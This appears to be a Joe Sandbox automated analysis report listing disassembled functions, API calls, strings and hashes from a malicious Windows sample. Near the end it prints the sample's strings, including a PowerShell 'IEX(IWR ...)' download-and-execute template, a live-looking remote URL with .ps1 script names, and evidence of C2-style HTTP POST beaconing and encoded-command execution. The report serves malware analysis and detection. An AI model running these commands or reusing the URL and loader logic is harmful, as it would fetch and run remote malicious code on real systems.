Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5eea61a9c5e0ecf24e1a2b566b617c20c7759777f29d1316fc7971c086d22d95
Instruction ID: 7cf6f5fee5c9287ff64b8889c49422ba751fa4cd37b7a16770dcf1fc550770d6
Opcode Fuzzy Hash: 5eea61a9c5e0ecf24e1a2b566b617c20c7759777f29d1316fc7971c086d22d95
Instruction Fuzzy Hash: C2B14A71610608DFDB18CF28D48AB657BA0FF45364F298658E8DACF2A1C339ED81CB40

Function 007944C5 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007944DB

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 316fa61e77cd0b4f69c61ed0400c9fb00556b4d583e09624afd3ddcd15d5ee07
Instruction ID: 77558f26702fd1411cccbb09d84bfba81079fb908827b05fad0a5a5380194f23
Opcode Fuzzy Hash: 316fa61e77cd0b4f69c61ed0400c9fb00556b4d583e09624afd3ddcd15d5ee07
Instruction Fuzzy Hash: 355181B19022058FDB68CF98E885BAABBF0FB85310F14C869D411EB250EB7C9951CF61

Function 00798ACD Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddeb98fd3cf9b44228f3445322740f0e0a7d4ad35907f119b5d86a389bfb3194
Instruction ID: 702628b0ec2935b297a4c016189ac851564603e24e08765aba15a9711bd00915
Opcode Fuzzy Hash: ddeb98fd3cf9b44228f3445322740f0e0a7d4ad35907f119b5d86a389bfb3194
Instruction Fuzzy Hash: EB31E6B2900219AFCF24DF68DC89DBB77B9EB86310F544199F91593240EE34AE40CB60

Function 011F24A0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 011F24A2

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: dfa331efd82a23266d69362560e85e45ea632975d2acd74d6abd28e4a7da0232
Instruction ID: 60890d6120873131b93b8215b356fe80a7def8af228de9fc9908110a266a2bdd
Opcode Fuzzy Hash: dfa331efd82a23266d69362560e85e45ea632975d2acd74d6abd28e4a7da0232
Instruction Fuzzy Hash: E3318C722144118BC36CCF28F8ADA6577E5FB89310B19823DD53ECB289D778E892CB50

Function 007943AF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000043BB,00793BBB), ref: 007943B4

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 372afebcfb980362f11ccf36ddaa5b45f0c70be94964f7c27aeb6b399a0e3b84
Instruction ID: a535a44fd043836c9cb598059d29f8b205e0b0327a0d88b67671409a1531b295
Opcode Fuzzy Hash: 372afebcfb980362f11ccf36ddaa5b45f0c70be94964f7c27aeb6b399a0e3b84
Instruction Fuzzy Hash:

Function 011F7440 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

0, xrefs: 011F74A0

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 4ac7998192c75c9670cedc4d86e067f12e7163e6d39f06fbc1c219510fbfdc62
Instruction ID: fe36e1c2e144d89f6ec528259e6252dd885156030def9cf59a3392ae16736aff
Opcode Fuzzy Hash: 4ac7998192c75c9670cedc4d86e067f12e7163e6d39f06fbc1c219510fbfdc62
Instruction Fuzzy Hash: 1051C531E143D84EDB1D8BEC58541FCBFB19F56200F5841AEDC9AA7682C6384A09CB61

Function 0079A845 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0079A845

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d6a54096869addcbbccc140c86804edebb8353a91f282c6d2e48fa94b5680303
Instruction ID: 45b5d546a5b0dc66037450c0a2db1123126f76dd047ceb64ef9b702cb34a1f74
Opcode Fuzzy Hash: d6a54096869addcbbccc140c86804edebb8353a91f282c6d2e48fa94b5680303
Instruction Fuzzy Hash: 83A012303001808B53008F309A0524936985686580B0180185504C5120DB2844504615

Function 011F4660 Relevance: .8, Instructions: 750COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6865c081a1309161320541036ca59e73264a56c2bbd692dcbec766834973040
Instruction ID: f459bab07855b9d6eb15052cabbddaed18570e1aa1d24b2680f760ddaec6e25f
Opcode Fuzzy Hash: d6865c081a1309161320541036ca59e73264a56c2bbd692dcbec766834973040
Instruction Fuzzy Hash: FD726E348241AE8EDB1DEB64D8646ECB735BF32314F5401FDC64A13996EB305A8ACF61

Function 011F4260 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51

Function 00799763 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
Instruction ID: 0a348d72bc072292fd38a073a683f6fe1f56eda08e2aca903bba95e6a3985898
Opcode Fuzzy Hash: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
Instruction Fuzzy Hash: BEE08C72A22238EBCF14DFCDE94898AF3ECEB84B40B15449AB601D3101C674DE00C7D0

Function 011F7D50 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 350
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 011F7D76
GetTickCount64.KERNEL32 ref: 011F7D84

Part of subcall function 011F66A0: ObtainUserAgentString.URLMON(00000000,?,?), ref: 011F66C2
Part of subcall function 011F66A0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 011F66E2
Part of subcall function 011F66A0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 011F6748
Part of subcall function 011F66A0: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 011F6781
Part of subcall function 011F66A0: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 011F679E
Part of subcall function 011F66A0: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 011F67D7
Part of subcall function 011F66A0: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 011F6800

Sleep.KERNEL32(00000000), ref: 011F7DD6
lstrcmpA.KERNEL32(00000000,INIT), ref: 011F7DE3
StrToIntA.SHLWAPI(00000000), ref: 011F7EA6
StrToIntA.SHLWAPI(00000000), ref: 011F7EEB
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 011F7F27
PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 011F7F40
wnsprintfW.SHLWAPI ref: 011F7F54
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 011F7F90
wnsprintfW.SHLWAPI ref: 011F7FA4

Part of subcall function 011F5610: GetProcessHeap.KERNEL32(00000000,00000000,011F82F5), ref: 011F5617
Part of subcall function 011F5610: HeapFree.KERNEL32(00000000), ref: 011F561E

GetModuleHandleA.KERNEL32(kernel32), ref: 011F7FC7
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 011F7FD5
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 011F7FEA
LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 011F804B
GetProcAddress.KERNEL32(00000000), ref: 011F8052
wsprintfA.USER32 ref: 011F80B2
wnsprintfA.SHLWAPI ref: 011F80DE

Part of subcall function 011F2750: GetProcessHeap.KERNEL32(00000008,?), ref: 011F2762
Part of subcall function 011F2750: HeapAlloc.KERNEL32(00000000), ref: 011F2769

Sleep.KERNEL32(00000000), ref: 011F8306

Strings

ShellExecuteW, xrefs: 011F8041
WindowsPowerShell\v1.0\powershell.exe, xrefs: 011F7F2D
Wow64DisableWow64FsRedirection, xrefs: 011F7FCF
%d|%s, xrefs: 011F7D70
shell32, xrefs: 011F8046
%d|%s|%.16s|, xrefs: 011F80AC
%s|%s, xrefs: 011F80D4
-enc %S, xrefs: 011F7F4A
INIT, xrefs: 011F7DDD
kernel32, xrefs: 011F7FB4
/c %S, xrefs: 011F7F9A
%ComSpec%, xrefs: 011F7F8B
Wow64RevertWow64FsRedirection, xrefs: 011F7FDB
open, xrefs: 011F8060

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
API String ID: 1920831074-1153165106
Opcode ID: a880412d8b71231d48da24f933715f0a02f00a0e615c394cebdc25b70adf803d
Instruction ID: 013a3c062c178dd9a3f0c5d1b7fa5f28ade89ffcb5d9c6778962bfb5cd889431
Opcode Fuzzy Hash: a880412d8b71231d48da24f933715f0a02f00a0e615c394cebdc25b70adf803d
Instruction Fuzzy Hash: A7C1C271E00209ABDB1CEFB4DC44BAEBBB5AF54714F10042DEB16A7280DB74AE44CB94

Function 011F66A0 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 230
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON(00000000,?,?), ref: 011F66C2
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 011F66E2
GetProcessHeap.KERNEL32(00000008,00000000), ref: 011F66FB
HeapAlloc.KERNEL32(00000000), ref: 011F6702
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 011F6723
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 011F6748
InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 011F6781
InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 011F679E
HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 011F67D7
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 011F6800
InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 011F681A
HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,?), ref: 011F682E
InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 011F6850
GetProcessHeap.KERNEL32(00000008,00000000), ref: 011F6869
HeapAlloc.KERNEL32(00000000), ref: 011F6870
GetProcessHeap.KERNEL32(00000008,?,00000000), ref: 011F687B
HeapReAlloc.KERNEL32(00000000), ref: 011F6882
InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 011F6896
InternetCloseHandle.WININET(00000000), ref: 011F68B8
InternetCloseHandle.WININET(00000000), ref: 011F68C3
InternetCloseHandle.WININET(00000000), ref: 011F68C9
GetProcessHeap.KERNEL32(00000000,?), ref: 011F68FC
HeapFree.KERNEL32(00000000), ref: 011F68FF
GetProcessHeap.KERNEL32(00000000,?), ref: 011F690B
HeapFree.KERNEL32(00000000), ref: 011F690E
GetProcessHeap.KERNEL32(00000000,?), ref: 011F691A
HeapFree.KERNEL32(00000000), ref: 011F691D

Strings

`, xrefs: 011F6758
Content-Type: application/octet-streamContent-Encoding: binary, xrefs: 011F6828
POST, xrefs: 011F67D1

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
API String ID: 2744214989-3343008755
Opcode ID: 96b55c79c12d95b3c9b7f780866649898ebb624e1e879543dc8553a07d1a0935
Instruction ID: a221cbf1d1db24faed8f0ba2ea20175a6153576792e3f7683a1eb87bacedd686
Opcode Fuzzy Hash: 96b55c79c12d95b3c9b7f780866649898ebb624e1e879543dc8553a07d1a0935
Instruction Fuzzy Hash: B97163B1A44219BBEB259BA4DC45FAE7BBCEB04710F14412DFB11F7280D7709944CB64

Function 00792AE0 Relevance: 37.0, APIs: 3, Strings: 18, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

Part of subcall function 007926F0: operator!=.LIBCPMTD ref: 007927B9
Part of subcall function 007926F0: task.LIBCPMTD ref: 007927CA
Part of subcall function 007926F0: task.LIBCPMTD ref: 007927D9

Part of subcall function 00792870: task.LIBCPMTD ref: 00792889

Part of subcall function 00792A60: task.LIBCPMTD ref: 00792AB3
Part of subcall function 00792A60: task.LIBCPMTD ref: 00792AC2

task.LIBCPMTD ref: 00792C96

Part of subcall function 00792450: task.LIBCPMTD ref: 007924E6
Part of subcall function 00792450: task.LIBCPMTD ref: 007924F2
Part of subcall function 00792450: task.LIBCPMTD ref: 007924FE
Part of subcall function 00792450: task.LIBCPMTD ref: 0079250A
Part of subcall function 00792450: task.LIBCPMTD ref: 00792519

Part of subcall function 00791BD0: task.LIBCPMTD ref: 00791C63
Part of subcall function 00791BD0: task.LIBCPMTD ref: 00791C72

Part of subcall function 00791D30: operator!=.LIBCPMTD ref: 00791DB9
Part of subcall function 00791D30: task.LIBCPMTD ref: 00791DC7
Part of subcall function 00791D30: task.LIBCPMTD ref: 00791DD6

Part of subcall function 00791E90: task.LIBCPMTD ref: 00791F50
Part of subcall function 00791E90: task.LIBCPMTD ref: 00791F5F

Part of subcall function 00791FF0: task.LIBCPMTD ref: 0079204A
Part of subcall function 00791FF0: task.LIBCPMTD ref: 00792056
Part of subcall function 00791FF0: task.LIBCPMTD ref: 00792065

Part of subcall function 00792090: task.LIBCPMTD ref: 007920E6

task.LIBCPMTD ref: 00792E58
task.LIBCPMTD ref: 00792EFC

Part of subcall function 007921A0: operator!=.LIBCPMTD ref: 00792294
Part of subcall function 007921A0: task.LIBCPMTD ref: 007922A5
Part of subcall function 007921A0: task.LIBCPMTD ref: 007922B4

Strings

bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs, xrefs: 00792BAF
ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund, xrefs: 00792C12
rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo, xrefs: 00792DE8
shtumcttjzvhu, xrefs: 00792E65
upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs, xrefs: 00792B5E
sqfyhcibiyaixyvseuhuztdlx, xrefs: 00792C6B
cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho, xrefs: 00792E11
nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs, xrefs: 00792DA3
fuisqwdbksjnkwghhwh, xrefs: 00792CC8
gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa, xrefs: 00792D71
gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj, xrefs: 00792ECF
syntqwezljesnhnfjaztdeotfzpejojodftab, xrefs: 00792EB0
yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy, xrefs: 00792E36
jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu, xrefs: 00792D8A
brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis, xrefs: 00792E7E
bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg, xrefs: 00792CFB
rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb, xrefs: 00792C52
jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd, xrefs: 00792E97

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: task$operator!=$char_traits
String ID: bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg$bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs$brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis$ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund$cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho$fuisqwdbksjnkwghhwh$gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj$gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa$jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu$jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd$nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs$rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb$rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo$shtumcttjzvhu$sqfyhcibiyaixyvseuhuztdlx$syntqwezljesnhnfjaztdeotfzpejojodftab$upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs$yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy
API String ID: 1022754510-231213261
Opcode ID: 08ba15a239198e0ceb60b1284c1314ddf7fce7cf7d9ec832cd31a9b674b3fc61
Instruction ID: 8fa848af34d7e98686e7966aca4a7ef129be1c24b50804ecb3e2e868f1665ddc
Opcode Fuzzy Hash: 08ba15a239198e0ceb60b1284c1314ddf7fce7cf7d9ec832cd31a9b674b3fc61
Instruction Fuzzy Hash: 14B14D70E50708EADB04FFB8DD1B7AEBB71AF47B00F404259E4513B1C6EA791A548B92

Function 007921A0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080

operator!=.LIBCPMTD ref: 00792294
task.LIBCPMTD ref: 007922A5
task.LIBCPMTD ref: 007922B4

Strings

lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa, xrefs: 007921E5
-, xrefs: 007923C5
P, xrefs: 00792326
ianh, xrefs: 007921D1, 0079234E, 00792374
[, xrefs: 00792301
oyr, xrefs: 007921F6

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: -$P$[$ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
API String ID: 2802545854-2318821752
Opcode ID: 242dd87ea2173ec3308cf0a804c130ea34fbcaf8756cbe3954d940704cc86966
Instruction ID: 4121e8f4bc109ded1ea3badc7abf59354c88f25f7990e9935490d72d7aa73e6c
Opcode Fuzzy Hash: 242dd87ea2173ec3308cf0a804c130ea34fbcaf8756cbe3954d940704cc86966
Instruction Fuzzy Hash: E3715A70D04258DEDF24EB68E859BEDBBB1BB01304F10819DD049A7282DB795B89DF51

Function 011F8530 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 69stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 011F8551
ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 011F8564
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 011F8577
GetFileAttributesW.KERNEL32(?), ref: 011F859D
GetFileAttributesW.KERNEL32(?), ref: 011F85B6
lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 011F85CD
wnsprintfW.SHLWAPI ref: 011F85F0
ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 011F8612

Strings

%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 011F855F
%ComSpec%, xrefs: 011F8572
https://kionaonline.com/modules/bonslick, xrefs: 011F85DA
/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 011F85DF
sd2.ps1, xrefs: 011F85A8
%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 011F854C
open, xrefs: 011F860B
sd4.ps1, xrefs: 011F85C1

Memory Dump Source

